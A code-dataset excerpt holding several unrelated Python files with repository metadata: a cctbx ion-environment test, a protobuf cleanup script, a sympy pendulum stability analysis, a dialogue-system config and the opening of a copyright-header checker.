:return: Each item is a pair comprising a name (key) and its float value
:rtype: list of tuple
"""
result = self.comparison_helper.perform_comparison(state_pressure=sim_state.time,
state_data=sim_state.attributes)
return result
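
# Illustrative usage sketch (Point objects with .id and .distance() come from
# stomasimulator.geom; the names below are hypothetical):
#   calc = DistanceCalculator('pore-width', (pt_a, pt_b))
#   widths = calc.calculate({pt_a.id: pt_a, pt_b.id: pt_b})
#   # -> {'pore-width': <float distance>}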
if __name__ == '__main__':
pass
| 37.538043 | 106 | 0.624005 | 822 | 6,907 | 4.954988 | 0.209246 | 0.026516 | 0.035355 | 0.029462 | 0.228333 | 0.214829 | 0.176528 | 0.153695 | 0.153695 | 0.09698 | 0 | 0.008851 | 0.296656 | 6,907 | 183 | 107 | 37.743169 | 0.829559 | 0.224989 | 0 | 0.258427 | 0 | 0 | 0.013647 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 1 | 0.224719 | false | 0.022472 | 0.011236 | 0.022472 | 0.449438 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8fc2913caa7185f3d28c952db02652d27ed5b76 | 8,940 | py | Python | mmtbx/ions/tst_environment.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | mmtbx/ions/tst_environment.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | mmtbx/ions/tst_environment.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | # -*- coding: utf-8; py-indent-offset: 2 -*-
from __future__ import division
from mmtbx.ions.environment import ChemicalEnvironment
import mmtbx.ions.identify
from mmtbx import ions
import mmtbx.monomer_library.pdb_interpretation
from mmtbx import monomer_library
from mmtbx.ions.environment import chem_carboxy, chem_amide, chem_backbone, \
chem_water, chem_phosphate, \
chem_nitrogen_primary, chem_nitrogen_secondary, \
chem_chloride, chem_oxygen, chem_nitrogen, chem_sulfur
import libtbx.load_env
from collections import OrderedDict, Counter
import os
import sys
def exercise () :
if not libtbx.env.has_module("phenix_regression"):
print "Skipping {}".format(os.path.split(__file__)[1])
return
models = OrderedDict([
("2qng", [
Counter({chem_oxygen: 7, chem_carboxy: 2, chem_water: 2,
chem_backbone: 3}),
Counter({chem_oxygen: 6, chem_carboxy: 3, chem_water: 1,
chem_backbone: 2}),
]),
("3rva", [
Counter({chem_oxygen: 6, chem_carboxy: 4, chem_water: 2}),
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_nitrogen: 4, chem_nitrogen_primary: 1,
chem_nitrogen_secondary: 3, chem_backbone: 3}),
]),
("1mjh", [
Counter({chem_oxygen: 6, chem_water: 3, chem_phosphate: 3}),
Counter({chem_oxygen: 6, chem_water: 3, chem_phosphate: 3}),
]),
("4e1h", [
Counter({chem_oxygen: 6, chem_carboxy: 4}),
Counter({chem_oxygen: 6, chem_carboxy: 3}),
Counter({chem_oxygen: 6, chem_carboxy: 3}),
]),
("2xuz", [
Counter({chem_oxygen: 6}),
]),
("3zli", [
Counter({chem_nitrogen: 2, chem_oxygen: 4, chem_nitrogen_secondary: 2,
chem_carboxy: 1, chem_water: 1}),
Counter({chem_sulfur: 4}),
Counter({chem_nitrogen: 2, chem_oxygen: 4, chem_nitrogen_secondary: 2,
chem_carboxy: 1, chem_water: 1}),
Counter({chem_sulfur: 4}),
]),
("3e0f", [
Counter({chem_nitrogen: 2, chem_oxygen: 4, chem_nitrogen_secondary: 2,
chem_carboxy: 2, chem_phosphate: 2}),
Counter({chem_nitrogen: 2, chem_oxygen: 2, chem_nitrogen_secondary: 2,
chem_carboxy: 1, chem_phosphate: 1}),
Counter({chem_nitrogen: 2, chem_oxygen: 3, chem_nitrogen_secondary: 2,
chem_carboxy: 2, chem_phosphate: 1}),
]),
("3dkq", [
Counter({chem_nitrogen: 4, chem_oxygen: 1, chem_nitrogen_secondary: 4,
chem_carboxy: 1}),
Counter({chem_nitrogen: 2, chem_oxygen: 1, chem_nitrogen_secondary: 2,
chem_carboxy: 1}),
Counter({chem_nitrogen: 4, chem_oxygen: 1, chem_nitrogen_secondary: 4,
chem_carboxy: 1}),
]),
("2o8q", [
Counter({chem_nitrogen: 3, chem_oxygen: 3, chem_nitrogen_secondary: 3,
chem_water: 3}),
Counter({chem_nitrogen: 3, chem_oxygen: 3, chem_nitrogen_secondary: 3,
chem_water: 3}),
]),
("1tgg", [
Counter({chem_oxygen: 5, chem_chloride: 1, chem_carboxy: 4,
chem_water: 1}),
Counter({chem_oxygen: 3, chem_chloride: 2, chem_carboxy: 3}),
Counter({chem_oxygen: 4, chem_chloride: 2, chem_carboxy: 4}),
]),
("3zu8", [
Counter({chem_oxygen: 7, chem_carboxy: 3, chem_water: 1,
chem_backbone: 2}),
Counter({chem_nitrogen: 4, chem_oxygen: 1, chem_nitrogen_primary: 1,
chem_nitrogen_secondary: 3, chem_carboxy: 1, chem_backbone: 3}),
]),
("1ofs", [
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
]),
("3ul2", [
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_backbone: 1,
chem_water: 2}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
]),
("3snm", [
Counter({chem_oxygen: 5, chem_amide: 1, chem_carboxy: 3,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 3, chem_nitrogen_secondary: 1,
chem_carboxy: 3}),
]),
("3qlq", [
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
]),
("2gdf", [
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_oxygen: 6, chem_amide: 1, chem_carboxy: 3, chem_water: 1,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_oxygen: 6, chem_amide: 1, chem_carboxy: 3, chem_water: 1,
chem_backbone: 1}),
]),
("1q8h", [
Counter({chem_oxygen: 7, chem_carboxy: 6, chem_water: 1}),
Counter({chem_oxygen: 7, chem_carboxy: 4, chem_water: 3}),
Counter({chem_oxygen: 8, chem_carboxy: 6, chem_water: 2}),
]),
])
for model, expected_environments in models.items():
pdb_path = libtbx.env.find_in_repositories(
relative_path = os.path.join(
"phenix_regression", "mmtbx", "ions", model + ".pdb"),
test = os.path.isfile
)
mon_lib_srv = monomer_library.server.server()
ener_lib = monomer_library.server.ener_lib()
processed_pdb_file = monomer_library.pdb_interpretation.process(
mon_lib_srv = mon_lib_srv,
ener_lib = ener_lib,
file_name = pdb_path,
raw_records = None,
force_symmetry = True,
log = libtbx.utils.null_out()
)
geometry = \
processed_pdb_file.geometry_restraints_manager(show_energies = False)
xray_structure = processed_pdb_file.xray_structure()
pdb_hierarchy = processed_pdb_file.all_chain_proxies.pdb_hierarchy
connectivity = geometry.shell_sym_tables[0].full_simple_connectivity()
manager = mmtbx.ions.identify.manager(
fmodel = None,
pdb_hierarchy = pdb_hierarchy,
xray_structure = xray_structure,
connectivity = connectivity)
elements = set(ions.DEFAULT_IONS + ions.TRANSITION_METALS)
elements.difference_update(["CL"])
metals = [i_seq for i_seq, atom in enumerate(manager.pdb_atoms)
if atom.fetch_labels().resname.strip().upper() in elements]
assert len(metals) == len(expected_environments)
for index, metal, expected_environment in \
zip(xrange(len(metals)), metals, expected_environments):
env = ChemicalEnvironment(
metal,
manager.find_nearby_atoms(metal, filter_by_two_fofc = False),
manager
)
if env.chemistry != expected_environment:
print "Problem detecting chemistry environment in", model, index
print "Found: ", env.chemistry
print "Should be:", expected_environment
sys.exit()
print "OK"
if __name__ == "__main__":
exercise()
| 41.581395 | 80 | 0.631767 | 1,137 | 8,940 | 4.644679 | 0.146878 | 0.129521 | 0.072714 | 0.084832 | 0.642871 | 0.602159 | 0.567885 | 0.526605 | 0.503882 | 0.439879 | 0 | 0.039216 | 0.24698 | 8,940 | 214 | 81 | 41.775701 | 0.745247 | 0.004698 | 0 | 0.44 | 0 | 0 | 0.022482 | 0 | 0 | 0 | 0 | 0 | 0.005 | 0 | null | null | 0 | 0.055 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8fecc2152a699d192482875bb377312659faf77 | 577 | py | Python | async-utils/setup.py | goc9000/python-library | 0a4a09278df6e84061baedda8997071e2201103f | [
"MIT"
] | null | null | null | async-utils/setup.py | goc9000/python-library | 0a4a09278df6e84061baedda8997071e2201103f | [
"MIT"
] | null | null | null | async-utils/setup.py | goc9000/python-library | 0a4a09278df6e84061baedda8997071e2201103f | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='atmfjstc-async-utils',
version='0.1.0',
author_email='atmfjstc@protonmail.com',
package_dir={'': 'src'},
packages=find_packages(where='src'),
install_requires=[
],
zip_safe=True,
description="Utilities for async code",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Framework :: AsyncIO",
"Typing :: Typed",
],
python_requires='>=3.9',
)
| 20.607143 | 49 | 0.60312 | 60 | 577 | 5.683333 | 0.8 | 0.070381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013793 | 0.246101 | 577 | 27 | 50 | 21.37037 | 0.770115 | 0 | 0 | 0.1 | 0 | 0 | 0.389948 | 0.039861 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
770214b97687e419b49ca7614e24a42a26a9954c | 2,092 | py | Python | tools/clean_autogen_protos.py | embeddery/stackrox | d653406651df4331a714839ec2c0a23a93425c64 | [
"Apache-2.0"
] | 22 | 2022-03-31T14:32:18.000Z | 2022-03-31T22:11:30.000Z | tools/clean_autogen_protos.py | embeddery/stackrox | d653406651df4331a714839ec2c0a23a93425c64 | [
"Apache-2.0"
] | 5 | 2022-03-31T14:35:28.000Z | 2022-03-31T22:40:13.000Z | tools/clean_autogen_protos.py | embeddery/stackrox | d653406651df4331a714839ec2c0a23a93425c64 | [
"Apache-2.0"
] | 4 | 2022-03-31T16:33:58.000Z | 2022-03-31T22:19:26.000Z | #!/usr/bin/env python3
import argparse
import pathlib
GENERATED_EXTENSIONS = ["pb.go", "pb.gw.go", "swagger.json"]
def find_files(path, fileglob):
files_full = list(path.glob(fileglob))
return files_full
def strip_path_extension(filelist):
# We cannot use Path.stem directly as it doesn't handle double extensions (.pb.go) correctly
files_extensionless = list(map(lambda f: (str(f).replace("".join(f.suffixes), "")), filelist))
files_name_only = list(map(lambda f: pathlib.Path(f).stem, files_extensionless))
return files_name_only
def find_difference(generated_list, proto_list):
difference = set(generated_list) - set(proto_list)
return difference
def filter_only_gen_files(candidates):
return [x for x in candidates if any(str(x.name).endswith(extension) for extension in GENERATED_EXTENSIONS)]
def find_in_list(target_list, searchterms):
searchterms = [f"{x}." for x in searchterms] # Add a dot to only match full filenames
return [x for x in target_list if any(str(x.name).startswith(term) for term in searchterms )]
def remove_files(target_list):
for target in target_list:
target.unlink()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--protos", type=pathlib.Path, help="Path to proto dir")
parser.add_argument("--generated", type=pathlib.Path, help="Path to generated sources dir")
v = parser.parse_args()
proto_files = find_files(v.protos, "**/*.proto")
generated_files = [f
for file_list in (find_files(v.generated, f'**/*.{ext}') for ext in GENERATED_EXTENSIONS)
for f in file_list]
proto_stripped = strip_path_extension(proto_files)
generated_stripped = strip_path_extension(generated_files)
diff = find_difference(generated_stripped, proto_stripped)
full_paths = find_in_list(generated_files, diff)
final_diff = filter_only_gen_files(full_paths)
if len(final_diff) > 0:
print(f"Removing: {final_diff}")
remove_files(final_diff)
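
# Example invocation (paths are illustrative):
#   ./clean_autogen_protos.py --protos proto/ --generated generated/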
if __name__ == '__main__':
main()
| 31.223881 | 112 | 0.707935 | 293 | 2,092 | 4.8157 | 0.320819 | 0.028349 | 0.038271 | 0.014883 | 0.072289 | 0.035436 | 0 | 0 | 0 | 0 | 0 | 0.001167 | 0.180688 | 2,092 | 66 | 113 | 31.69697 | 0.822054 | 0.07218 | 0 | 0 | 1 | 0 | 0.074303 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.175 | false | 0 | 0.05 | 0.025 | 0.35 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77076be0aee637dc1db01b51cb1e1bf652954a05 | 7,016 | py | Python | src/single_pendulum.py | dpopchev/Computation_python | 790bfc451b003ecbc626867035dc03a7b55d1fb9 | [
"MIT"
] | null | null | null | src/single_pendulum.py | dpopchev/Computation_python | 790bfc451b003ecbc626867035dc03a7b55d1fb9 | [
"MIT"
] | null | null | null | src/single_pendulum.py | dpopchev/Computation_python | 790bfc451b003ecbc626867035dc03a7b55d1fb9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# do not hesitate to debug
import pdb
# python computation modules and visualization
import numpy as np
import sympy as sy
import scipy as sp
import matplotlib.pyplot as plt
from sympy import Q as syQ
sy.init_printing(use_latex=True,forecolor="White")
def Lyapunov_stability_test_linear(ev):
''' test if a linear homogeneous system with constant coefficients is stable
in the sense of Lyapunov by checking the theorem conditions against the
provided eigenvalues
source https://www.math24.net/stability-theory-basic-concepts/
TODO taking into account eigenvalue multiplicity '''
# the criteria result will be saved here
r = None
# system is asymptotically stable if only if
# all eigenvalues have negative real parts
r = 'asymptotically stable' if ( not r
and all(sy.ask(syQ.negative(sy.re(_))) for _ in ev) ) else None
# system is stable if and only if
# all eigenvalues have nonpositive real parts
# TODO incorporate algebraic and geometric multiplicity criteria
r = 'stable' if ( not r
and all(sy.ask(syQ.nonpositive(sy.re(_))) for _ in ev) ) else None
# system is unstable if
# at least one eigenvalue has positive real part
# TODO incorporate algebraic and geometric multiplicity criteria
r = 'unstable' if ( not r
and any(sy.ask(syQ.positive(sy.re(_))) for _ in ev) ) else None
return r
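
# Quick illustrative check (not from the original source): both eigenvalues
# below have strictly negative real parts, so the test should report
# 'asymptotically stable'.
#   Lyapunov_stability_test_linear([sy.Integer(-1), -2 + 3*sy.I])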
def Lyapunov_stability_test_nonlinear(ev):
''' test if the fixed point of a nonlinear structure stable system
is stable, unstable, critical or impossible to determine using Lyapunov
criteria of first order and thus other methods are needed
TODO tests are only applicable for structurally stable systems, i.e.
with purely imaginary eigenvalues are not taken into account
source https://www.math24.net/stability-first-approximation/ '''
# the criteria result will be saved here
r = None
# system is asymptotically stable if only if
# all eigenvalues have negative real parts
r = 'asymptotically stable' if ( not r
and all(sy.ask(syQ.negative(sy.re(_))) for _ in ev) ) else None
# system is unstable if
# at least one eigenvalue has positive real part
r = 'unstable' if ( not r
and any(sy.ask(syQ.positive(sy.re(_))) for _ in ev) ) else None
# if all eigenvalues have non-positive real parts,
# and there is at least one eigenvalue with zero real part
# then fixed point can be stable or unstable and other methods should be
# used, thus mark the point critical
r = 'critical' if ( not r
        and all(sy.ask(syQ.nonpositive(sy.re(_))) for _ in ev)
and any(sy.re(_) == 0 for _ in ev)
) else None
return r if r else 'not decided'
def RouthHurwitz_Criterion(p):
''' return principal minors of Hurwitz matrix as sympy polynomials, which if
all are positive it is sufficient condition for asymptotic stability
NOTE: if all n-1 principal minors are positive, and nth minor is zero,
the system is at the boundary of stability, with two cases:
a_n = 0 -- one of the root is zero and system is on the boundary of
aperiodic stability
n-1 minor is zero -- there are two complex conjugate imaginary roots and
the system is at boundary of oscillatory stability
source https://www.math24.net/routh-hurwitz-criterion/ '''
# initial key and index pair needed to create Hurwitz matrix via sympy banded
# each entry is of the type [ dictionary key, coefficient slice ]
idxs = [ [ 1, 0 ] ]
# generate next key by decrementing with 1
genKey = lambda _: _ - 1
# generate next index by incrementing with 1 if key was nonnegative
# or with 2 if key is negative
genSlice = lambda _, __: __ + 1 if _ >= 0 else __ + 2
# fill the rest pairs w.r.t. the polynomial degree - 1, as we already have
# one entry
for _ in range(p.degree() - 1):
key = genKey(idxs[-1][0])
idxs.append( [ key, genSlice(key, idxs[-1][1] ) ] )
# create the matrix itself
H = sy.banded({ k: p.all_coeffs()[v:] for k, v in idxs })
return [ H[:_, :_].det() if _ > 0 else p.LC() for _ in range(0, p.degree()+1) ]
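
# Worked illustrative example (not from the original source): for
# p(s) = s**3 + 2*s**2 + 3*s + 1 the returned list is [1, 2, 5, 5]
# (leading coefficient first, then the principal minors); all entries are
# positive, so the polynomial is asymptotically stable by Routh-Hurwitz.
#   s = sy.symbols('s')
#   RouthHurwitz_Criterion(sy.Poly(s**3 + 2*s**2 + 3*s + 1, s))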
# define independent variable
t = sy.symbols('t', real=True)
# define dependent variables individually and pact them in an variable
theta, omega = sy.symbols(r'\theta, \omega', real = True)
Y = theta, omega
# define free parameters of they system and pack them in a variable
g, L = sy.symbols('g, L', positive = True)
parms = g, L
# create rhs as sympy expressions
theta_dt = omega
omega_dt = -(g/L)*sy.sin(theta)
rhs = {}
rhs['sympy'] = sy.Matrix([theta_dt, omega_dt])
# convert the sympy matrix function to numpy function with usual signature
rhs['numpy'] = sy.lambdify((t, Y, *parms), rhs['sympy'], 'numpy')
# create Jacobian matrix as sympy expression
J = {}
J['sympy'] = rhs['sympy'].jacobian(Y)
# convert the sympy Jacobian expression to numpy function with usual signature
J['numpy'] = sy.lambdify((t, Y, *parms), J['sympy'])
# calculate rhs fixed points
fixed_points = sy.solve(rhs['sympy'], Y)
# substitute each fixed point in the Jacobian
# and calculate the eigenvalues
J_fixed = {}
for i, fp in enumerate(fixed_points):
J_subs = J['sympy'].subs( [(y, v) for y, v in zip(Y, fp)])
#J_eigenvals = J_subs.eigenvals(multiple=True)
J_eigenvals = J_subs.eigenvals()
# save the fixed point results in more details
# most importantly the eigenvalues and their corresponding multiplicity
J_fixed[i] = {
'fixed point': fp,
'subs': J_subs,
'eigenvalues': list(J_eigenvals.keys()),
'multiplicity': list(J_eigenvals.values())
}
def plot_phase_portrait(ax, rhs, section, args=(), n_points=25):
''' plot section of phase space of a field defined via its rhs '''
# create section grid
x_grid, y_grid = np.meshgrid(
np.linspace( section[0][0], section[0][1], n_points ),
np.linspace( section[1][0], section[1][1], n_points )
)
# calculate rhs on the grid
xx, yy = rhs(None, ( x_grid, y_grid ), *args)
# compute vector norms and make line width proportional to them
# i.e. greater the vector length, the thicker the line
# TODO not sure why rhs returns different shape
vector_norms = np.sqrt(xx[0]**2 + yy[0]**2)
lw = 0.25 + 3*vector_norms/vector_norms.max()
# plot the phase portrait
ax.streamplot(
x_grid, y_grid,
xx[0], yy[0],
linewidth = lw,
arrowsize = 1.2,
density = 1
)
return ax
def plot_main():
fig, ax = plt.subplots()
ax = plot_phase_portrait(
ax,
rhs['numpy'],
(
( -np.pi, np.pi ),
( -2*np.pi, 2*np.pi)
),
args = ( 5, 1 ),
)
if __name__ == '__main__':
plot_main()
| 34.392157 | 83 | 0.651511 | 1,036 | 7,016 | 4.333012 | 0.303089 | 0.016039 | 0.010916 | 0.012029 | 0.256182 | 0.222098 | 0.175986 | 0.165738 | 0.140566 | 0.134774 | 0 | 0.010699 | 0.253991 | 7,016 | 203 | 84 | 34.561576 | 0.846962 | 0.489453 | 0 | 0.11236 | 0 | 0 | 0.06043 | 0 | 0 | 0 | 0 | 0.014778 | 0 | 1 | 0.05618 | false | 0 | 0.067416 | 0 | 0.168539 | 0.011236 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7714068c84e56c46ce9cbe59a4ed57f2565d3970 | 1,750 | py | Python | E2E_TOD/config.py | kingb12/pptod | 4cc920494b663c5352a507ed1e32f1e2509a8c93 | [
"Apache-2.0"
] | 54 | 2021-10-02T13:31:09.000Z | 2022-03-25T03:44:54.000Z | E2E_TOD/config.py | programmeddeath1/pptod | 52d26ddc7b917c86af721e810a202db7c7d3b398 | [
"Apache-2.0"
] | 8 | 2021-11-10T06:05:20.000Z | 2022-03-25T03:27:29.000Z | E2E_TOD/config.py | programmeddeath1/pptod | 52d26ddc7b917c86af721e810a202db7c7d3b398 | [
"Apache-2.0"
] | 14 | 2021-10-02T13:31:01.000Z | 2022-03-27T15:49:33.000Z | import logging, time, os
class Config:
def __init__(self, data_prefix):
# data_prefix = r'../data/'
self.data_prefix = data_prefix
self._multiwoz_damd_init()
def _multiwoz_damd_init(self):
self.vocab_path_train = self.data_prefix + '/multi-woz-processed/vocab'
self.data_path = self.data_prefix + '/multi-woz-processed/'
self.data_file = 'data_for_damd.json'
self.dev_list = self.data_prefix + '/multi-woz/valListFile.json'
self.test_list = self.data_prefix + '/multi-woz/testListFile.json'
self.dbs = {
'attraction': self.data_prefix + '/db/attraction_db_processed.json',
'hospital': self.data_prefix + '/db/hospital_db_processed.json',
'hotel': self.data_prefix + '/db/hotel_db_processed.json',
'police': self.data_prefix + '/db/police_db_processed.json',
'restaurant': self.data_prefix + '/db/restaurant_db_processed.json',
'taxi': self.data_prefix + '/db/taxi_db_processed.json',
'train': self.data_prefix + '/db/train_db_processed.json',
}
self.domain_file_path = self.data_prefix + '/multi-woz-processed/domain_files.json'
self.slot_value_set_path = self.data_prefix + '/db/value_set_processed.json'
self.exp_domains = ['all'] # hotel,train, attraction, restaurant, taxi
self.enable_aspn = True
self.use_pvaspn = False
self.enable_bspn = True
self.bspn_mode = 'bspn' # 'bspn' or 'bsdx'
self.enable_dspn = False # removed
self.enable_dst = False
self.exp_domains = ['all'] # hotel,train, attraction, restaurant, taxi
self.max_context_length = 900
self.vocab_size = 3000
| 42.682927 | 91 | 0.645714 | 222 | 1,750 | 4.783784 | 0.283784 | 0.12806 | 0.19774 | 0.120527 | 0.292844 | 0.247646 | 0.169492 | 0.103578 | 0.103578 | 0.103578 | 0 | 0.005204 | 0.231429 | 1,750 | 40 | 92 | 43.75 | 0.784387 | 0.076571 | 0 | 0.0625 | 0 | 0 | 0.277191 | 0.229956 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.03125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
771d3fa0c3bd43d72d1bdf5d1c6f1888cb0021be | 15,025 | py | Python | CopyrightHeaderChecker.py | medazzo/CopyRitghHeaderChecker- | 320642ebd9216338820b6876519e9fae69252dd7 | [
"MIT"
] | 2 | 2019-01-07T14:42:44.000Z | 2019-01-07T14:42:46.000Z | CopyrightHeaderChecker.py | medazzo/CopyRightHeaderChecker | 320642ebd9216338820b6876519e9fae69252dd7 | [
"MIT"
] | null | null | null | CopyrightHeaderChecker.py | medazzo/CopyRightHeaderChecker | 320642ebd9216338820b6876519e9fae69252dd7 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# @author Mohamed Azzouni , Paris, France
#
import os
import time
import ntpath
import sys
import json
import argparse
from os.path import join, getsize
from shutil import copyfile
behaviour = """{
"reporting": true ,
"updatefiles": true ,
"excludeDirs" :[".git",".repo"],
"shebang":
{
"she":["#!/","#!/bin","#!/usr/bin"],
"check": true
},
"oldCopyright":
{
"lookforandwarn": true,
"forceNewCopyright": false,
"numberofline":6
},
"checks":
[
{
"brief":"C/C++ Code",
"extensions":[".c",".cpp",".h",".hpp"],
"names":[],
"copyright":[
"/// @author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$",
"/// ",
"/// @copyright $$CompanyYear$$ $$CompanyName$$",
"/// All rights exclusively reserved for $$CompanyName$$,",
"/// unless otherwise expressly agreed",
""]
},
{
"brief":"bash/scripting Code",
"extensions":[".conf",".conf.sample",".bb",".inc",".service",".sh",".cfg",".m4" ,".init",".py",".pl"],
"names":["init","run-ptest","llvm-config","build-env-set","init-build-env","setup-build-env","Dockerfile"],
"copyright":[
"# @author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$",
"#",
"# @copyright $$CompanyYear$$ $$CompanyName$$",
"# All rights exclusively reserved for $$CompanyName$$,",
"# unless otherwise expressly agreed",
""]
},
{
"brief":"html/js Code",
"extensions":[".html"],
"names":[],
"copyright":[
"<!-- @author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$ -->",
"<!-- -->",
"<!-- @copyright $$CompanyYear$$ $$CompanyName$$ -->",
"<!-- All rights exclusively reserved for $$CompanyName$$ , -->",
"<!-- unless otherwise expressly agreed -->",
""]
},
{
"brief":"Markdown Code",
"extensions":[".md"],
"names":[],
"copyright":[
"[comment]: <> (@author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$ )",
"[comment]: <> ( )",
"[comment]: <> (@copyright $$CompanyYear$$ $$CompanyName$$ )",
"[comment]: <> (All rights exclusively reserved for $$CompanyName$$, )",
"[comment]: <> (unless otherwise expressly agreed )",
""]
}
]
}"""
# Define
Debug = False
Outputfolder=""
Rbehaviour = json.loads(behaviour)
filesAlreadyCopyright = []
# Parameters :
# --dumpShebang : : dump the current list of managed shebang
# --dumpExtension : : dump the current list of managed files extensions
# -r --report [default: False]: if true print a complete report for what has done
# -u --update [default: False]: if true files will be updated else a modified copy will be generated
# -w --warnOldHeader [default: True]: warn about an old header found in files (passing the flag disables this)
# -f --forceOldHeader [default: False]: replace an old header if one exists (exclusive with option warnOldHeader)
# -n --nameCompany : : string
# -a --adressCompany : : string
# -c --countryCompany : : string
# -y --yearCompany : : string
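# Example invocation (values are illustrative):
#   ./CopyrightHeaderChecker.py process -r -n "Acme" -a "Paris" -c "France" -y "2020" -i ./src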
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Find all concerned Files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def SetupParserParameter( ):
""" this functions will setup parameter and parser for argument"""
parser = argparse.ArgumentParser(description='Checks sources code files for Copyright Header and add ours.',
prog='CopyrightHeaderChecker')
